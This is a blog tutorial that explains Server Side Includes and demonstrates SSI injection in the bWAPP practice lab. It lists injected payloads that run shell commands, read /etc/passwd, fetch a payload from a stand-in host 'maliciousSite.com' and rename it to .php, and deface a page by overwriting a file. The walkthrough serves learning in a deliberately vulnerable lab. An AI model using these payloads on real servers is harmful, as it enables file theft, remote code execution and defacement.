Server side include (SSI) Injection


What is Server side include

Before knowing what exactly it is, I would ask you a simple question. Let’s assume that you need to develop an application of 100 pages with dynamic content. And each page must have a Header, Footer, Logo. What would be your answer? How much time does it take to add header and footer in all the pages?

Here comes the feature so called Server Side Include (SSI). This is a time saving feature used for developing application with dynamic web content. The answer to the above question, to insert header, footer in all pages throughout the website we can use simple command ‘#include’ which inserts into another file. If we need to change anything in header, then we need to modify code in one single file. Web pages that contain SSIs often end with a .shtml extension where server understands that those pages that need to be processed.

syntax:

<!--#command key="value"-->

Yes, this looks like a comment in HTML/XML but it’s not! This SSI varies from server to server(Linux to Windows). I am sharing few examples on servers which are Linux based.
Real time examples for SSI which would be displaying server specific information such as current server time, visitor’s IP address, document type
examples:

<!--#config timefmt="%A %d %B, %Y" -->
<!--#echo var="DATE_LOCAL" -->
<!--#echo var="LAST_MODIFIED"-->

Server side include Injection

As you already know about HTML injections, now let’s see what is SSI injection and the impact of it. By the above introduction of SSI, you know that it’s quite useful, time saving, reusable component. Yea, I do agree with you. But what if your application is in wrong hands. What could happen? It’s something beyond your imagination. Do you want to know what all we could do if the web server permits SSI execution without proper validation?

Now it’s time to launch over bee-box server. Login to bWAPP and select SSI injection. You should see two input fields first name and last name.

001_001.png
POST by providing some valid data and notice the behavior. You should see your ip address in the web page as shown below.

002
How does this application know about your IP address? Okay let’s check source code buddy.

003

So this code is used to display the ip address of the user. Now let’s try to inject something and see whether we can grab some sensitive data.
Here’re few commands

<!--#echo var="DATE_LOCAL"-->
<!--#exec cmd="ls -al"-->
<!--#exec cmd="cat /etc/passwd"-->
<!--#echo var="DOCUMENT_URI" -->
<!--#exec cmd="wget http://maliciousSite.com/payload.txt | rename payload.txt payload.php" -->

On injecting with one of the above commands, I could see data in /etc/passwd

004
We can also deface the web page with simple command

<!--#exec cmd="echo 'You are hacked!' > /var/www/bWAPP/documents/bee_ssii.htm" -->

Now browse the url http://yourIPAddress/bWAPP/documents/bee_ssii.htm
You should see the defaced page. This is nothing but website Defacement which ruins all your reputation.

So, this is all about Server side include injection. If I miss anything, please feel free to post comments below.

DISCLAIMER: THE INFORMATION PUBLISHED IN THIS ARTICLE IS FOR EDUCATIONAL PURPOSE ONLY. ANY MISUSE OF THIS INFORMATION WILL NOT BE THE RESPONSIBILITY OF THE AUTHOR OF THE WEBSITE. THIS IS JUST MY LEARNING EXPERIENCE AND EDUCATIONAL BLOG FOR PEOPLE WHO WOULD LEARN FROM MY EXPERIENCE
Advertisements

3 thoughts on “Server side include (SSI) Injection

  1. Michael April 2, 2017 / 1:21 am

    Excellent writing. It would be great if you also provide the prevention methods

    Like

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s